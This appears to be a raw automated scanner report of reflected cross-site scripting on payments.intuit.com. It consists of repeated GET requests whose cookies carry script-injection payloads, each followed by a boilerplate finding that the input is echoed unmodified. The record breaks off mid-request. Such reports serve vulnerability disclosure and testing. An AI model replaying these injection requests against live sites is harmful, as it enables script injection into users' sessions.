GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T168d5f4"><script>alert(1)</script>87efd050621;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 62983<script>alert(1)</script>3ae0052e269 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1662983<script>alert(1)</script>3ae0052e269;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 666da<script>alert(1)</script>b41e58df354 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16666da<script>alert(1)</script>b41e58df354;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d083f"><script>alert(1)</script>9f3ce87ff72 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d083f"><script>alert(1)</script>9f3ce87ff72;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237a8"><script>alert(1)</script>3c9a92fa8e4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16237a8"><script>alert(1)</script>3c9a92fa8e4;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 72ea0<script>alert(1)</script>71ad3f15145 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1672ea0<script>alert(1)</script>71ad3f15145;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e45dc<script>alert(1)</script>7c80ec2b9be was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e45dc<script>alert(1)</script>7c80ec2b9be;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ddf"><script>alert(1)</script>911cfbd5c1d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1621ddf"><script>alert(1)</script>911cfbd5c1d;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 50dd2<script>alert(1)</script>22b5eb89f33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1650dd2<script>alert(1)</script>22b5eb89f33;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd521"><script>alert(1)</script>a06b40a6939 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bd521"><script>alert(1)</script>a06b40a6939;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8b6"><script>alert(1)</script>db141cf2372 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16be8b6"><script>alert(1)</script>db141cf2372;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ccada<script>alert(1)</script>03b0d3d035e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ccada<script>alert(1)</script>03b0d3d035e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cec2"><script>alert(1)</script>271f29d1570 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; 